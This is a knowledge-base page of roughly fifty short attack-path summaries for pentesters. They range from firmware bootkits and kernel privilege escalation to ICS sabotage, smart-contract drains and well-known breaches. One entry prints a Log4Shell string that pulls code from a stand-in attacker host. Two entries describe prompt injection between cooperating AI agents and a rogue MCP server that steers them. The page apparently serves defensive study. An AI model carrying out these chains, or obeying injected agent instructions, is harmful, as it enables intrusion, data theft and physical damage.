Attack paths
Community-reviewed graphs of pentest kill-chains, each stepping from initial access through to impact.
- Nº 0016 steps
LogoFAIL → UEFI bootkit → persistent ring-0
Drop a malformed JPG/PNG/BMP into the EFI partition's boot logo path. Vulnerable vendor UEFI parses it pre-OS, executes attacker code before SecureBoot's verifier — install a bootkit that survives wipe + reinstall.
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 0026 steps
Multi-agent confused-deputy → tool-call escalation
User-facing agent has limited tools; back-end planning agent has powerful tools (shell, file system). Prompt injection in user input → user agent → back-end agent. The back-end runs the attacker's intent under the planner's higher trust.
- Exec
- Exfil
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0036 steps
Cloudflare account compromise → Worker rewrite → mass cred theft
Phish a Cloudflare account belonging to a popular site operator. Deploy a Worker that injects JS into every response — captures form posts (logins, payments) for the duration the operator doesn't notice.
- Coll
- Evade
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0046 steps
Origin IP bypass → direct attack on backend
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
- Coll
- Evade
- Exfil
- Recon
Filed by AD Knowledge Base - Nº 0056 steps
Subdomain takeover → ACME DNS-01 → trusted cert for victim host
Find a dangling CNAME / NS record. Claim the underlying resource; complete Let's Encrypt's DNS-01 challenge for the parent hostname. Now have a publicly-trusted cert for victim.example.com — chain into AITM.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0066 steps
Compromised root CA → arbitrary cert issuance → silent MITM
Compromise the private key (or signing process) of a publicly-trusted root or intermediate. Issue an unlogged cert for the target hostname; use it for invisible TLS MITM until CT-log monitoring or revocation catches up.
- CredAcc
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 0076 steps
Industroyer2 IEC-104 substation hijack
Timed payload speaks IEC-60870-5-104 to substation RTUs at attacker-chosen hour; sends 'open breaker' commands across a substation, blackouts a grid section.
- Disco
- Exec
- Impact
- IA
Filed by AD Knowledge Base - Nº 0085 steps
TRITON-class SIS reprogram → disable safety shutdown
After OT-network foothold, reach a Triconex Safety Instrumented System. Download attacker logic that suppresses safety trips on a process that's about to be pushed past its safe envelope.
- Impact
- Lat-Move
Filed by AD Knowledge Base - Nº 0096 steps
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Coll
- Exec
- Impact
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0105 steps
5G core GTP-U user-plane injection → subscriber MITM
Attacker on a transit network between mobile-core hops (or with compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0115 steps
IMSI catcher → force 2G downgrade → SMS / call intercept
Operate a rogue base station in the target area. Phones associate; force fallback to 2G where no mutual auth is required. Intercept SMS OTPs, sniff voice calls, push notifications fail silently.
- Coll
- CredAcc
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0126 steps
Evil maid → sniff TPM unseal → decrypt BitLocker offline
Brief physical access to a TPM-only BitLocker laptop. Plug a logic analyser onto the LPC / SPI bus; capture the FVEK as the TPM unseals it at boot. Take the disk home, decrypt offline.
- CredAcc
- Disco
- Exfil
- IA
Filed by AD Knowledge Base - Nº 0136 steps
io_uring UAF → modprobe_path overwrite → root
Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0145 steps
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- Exfil
- Impact
- IA
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 0156 steps
SNMPv2c write-community → router config exfil → cred sprays
Find a router with 'private' RW community. Trigger SNMP-to-TFTP config download to attacker host. The config has RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user-pubkeys — spray harvested creds.
- Coll
- CredAcc
- Disco
- PrivEsc
Filed by AD Knowledge Base - Nº 0165 steps
Renderer compromise → GPU process → vulnerable kernel driver
After renderer RCE, talk to the GPU process via IPC. GPU process sends ioctls to a vulnerable graphics driver — full kernel R/W; ring0 from a web page.
- Evade
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0175 steps
Flash-loan veCRV → capture Curve gauge → emission redirect
Snapshot voting on Curve gauges uses veCRV balance at a specific block. Borrow large CRV via flash-loan, lock for max veCRV, vote in attacker pool's favour, unlock (or accept the limit) — emissions redirected for the epoch.
- Exfil
- Impact
- PrivEsc
Filed by AD Knowledge Base - Nº 0187 steps
nf_tables UAF → kernel R/W → root
CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0196 steps
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- CredAcc
- Disco
- Exfil
- Impact
- Recon
- +1
Filed by AD Knowledge Base - Nº 0205 steps
Mifare Classic crack → cloned hotel key
Many hotel / corporate door systems still use Mifare Classic. Capture nonces during normal use, recover the Crypto-1 key with mfoc / mfcuk, write to a 'magic UID' card — full access to the property.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0217 steps
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- Coll
- CredAcc
- IA
- Recon
Filed by AD Knowledge Base - Nº 0225 steps
WAF SSRF → IMDS → S3 mass exfil (Capital One 2019)
A misconfigured ModSecurity rule on a customer-facing app allowed SSRF; SSRF hit EC2 IMDSv1 for the instance role; the role had ListBucket + GetObject on a major customer-data bucket.
- Coll
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0235 steps
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker AS; traffic for that prefix flows through attacker for inspection / DoS.
- CredAcc
- Lat-Move
- ResDev
Filed by AD Knowledge Base - Nº 0246 steps
Mass SMS phish → Okta-style portal → SaaS sprawl (0ktapus)
Wide SMS phishing campaign targeting employees of ~130 organisations with a single phishlet that captures Okta credentials + push approval. Mass automated logins to Twilio, MailChimp, DoorDash et al.
- Exfil
- IA
- Recon
- ResDev
Filed by AD Knowledge Base - Nº 0256 steps
Apple Pay Express Transit relay → high-value contactless fraud
Specific configuration (Express Transit + Visa) allowed contactless transactions over £1k without unlock or per-tx auth. Two devices relayed the wallet from victim's pocket to a real terminal.
- Exfil
- Impact
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0267 steps
V8 type-confusion 1-day → renderer RCE
Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 0275 steps
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0285 steps
ERC-4626 first-depositor inflation → drain new deposits
Be the first depositor with 1 wei → mint 1 share. Send tokens directly to the vault to inflate share price. Every subsequent depositor's amount, integer-divided by the inflated rate, rounds to zero shares.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0296 steps
AMSI patch → in-memory .NET / PowerShell stager
Patch AmsiScanBuffer in amsi.dll → return clean for any content. Subsequent PowerShell / Office VBA / .NET runtime calls emit attacker code without scanning.
- C2
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 0306 steps
Leaked legacy VPN credential → ransomware (Colonial-class)
A dormant VPN account whose password appeared in a third-party breach is still active, has no MFA enforced. Sign in, recon AD, deploy ransomware across the estate.
- CredAcc
- Disco
- Impact
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0316 steps
Trusted updater hijack → wormable destructive payload (NotPetya / M.E.Doc)
Compromise a niche third-party vendor (regional tax software, niche industry tooling). Push a malicious update; every customer auto-installs it. Payload spreads via SMB + Mimikatz, wipes drives.
- Exec
- Impact
- IA
Filed by AD Knowledge Base - Nº 0327 steps
Vish helpdesk → Okta MFA reset → admin → ransomware (MGM-class)
Identify an Okta admin via LinkedIn. Vish the helpdesk pretending to be that admin, get MFA reset. Sign in, plant attacker MFA factor, then push policy changes that disable MFA for chosen apps before mass-deploying ransomware.
- CredAcc
- Impact
- IA
- Persist
- PrivEsc
- +1
Filed by AD Knowledge Base - Nº 0337 steps
Build-system implant → signed supply-chain backdoor (SolarWinds-class)
Compromise the target vendor's build server. A small implant rewrites a single source file at compile time — every official signed release downstream now ships the backdoor.
- C2
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0345 steps
Insider admin panel coercion → mass account takeover (Twitter 2020)
Identify employees with access to an internal admin panel. SE / coerce one to use the panel to change target accounts' email + 2FA, then take them over.
- CredAcc
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 0356 steps
Process hollowing → run beacon in svchost shell
Spawn svchost.exe suspended, unmap its image, write attacker PE into the same address space, resume — the process keeps a legit-looking PEB and command line but executes beacon code.
- C2
- Evade
- IA
Filed by AD Knowledge Base - Nº 0366 steps
Process doppelgänging → spawn signed image with attacker bytes
Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- Evade
- Exec
- IA
Filed by AD Knowledge Base - Nº 0375 steps
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- CredAcc
- Evade
- Exec
- IA
Filed by AD Knowledge Base - Nº 0385 steps
MITM HL7 v2 → tamper lab orders / results
HL7 v2 over MLLP is plaintext pipe-delimited. From the same VLAN as the lab analyser ↔ EHR link, MITM and rewrite OBX result segments — changes the patient's documented test result.
- CredAcc
- Impact
- IA
Filed by AD Knowledge Base - Nº 0395 steps
Unauth DICOM PACS → mass medical-image exfil
PACS server accepts unauthenticated C-FIND / C-MOVE on port 104 / 11112. Query for every study, pull every image — exfil hundreds of thousands of patient scans + DICOM metadata (PII).
- Coll
- Disco
- Exfil
Filed by AD Knowledge Base - Nº 0406 steps
Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- CredAcc
- Exec
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0416 steps
MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)
Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- Exec
- Exfil
- Impact
- IA
- Persist
- +1
Filed by AD Knowledge Base - Nº 0426 steps
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- CredAcc
- Exec
- IA
- Recon
- ResDev
Filed by AD Knowledge Base - Nº 0435 steps
Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- CredAcc
- Exec
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 0445 steps
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- CredAcc
- Disco
- Exec
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0454 steps
Uninitialised UUPS proxy implementation → brick contracts
UUPS upgradeable contracts must initialise the implementation contract itself. If skipped, anyone can call `initialise()` and become its owner — then call `selfdestruct` to brick every proxy referencing it (Parity Multisig 2017).
- Impact
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 0465 steps
MEV bot honeypot → drain searcher
Plant a transaction that looks like easy arbitrage in the public mempool. The MEV searcher bot front-runs into a trap contract whose 'profit' function reverts and seizes the searcher's gas + funds.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0476 steps
z/OS TN3270 → RACF userID brute → mainframe shell
Internet-/intranet-exposed TN3270 mainframe terminal. Userids follow predictable HR scheme. Brute-force passwords; many environments allow short / dictionary passwords for legacy reasons.
- CredAcc
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0485 steps
SAML signature wrapping (XSW) → impersonate admin
Capture a legitimate SAML response. Re-arrange the XML so the IdP's signature still validates against the original assertion, but the SP parses an attacker-injected assertion claiming Admin.
- CredAcc
- Exfil
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base - Nº 0496 steps
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Coll
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0505 steps
BACnet HVAC → disrupt building operations
BACnet on UDP/47808 is unauthenticated. From a foothold in corporate IT, write to HVAC controllers — over-cool a data centre, disable smoke evacuation, mess with elevators.
- CredAcc
- Disco
- Impact
Filed by AD Knowledge Base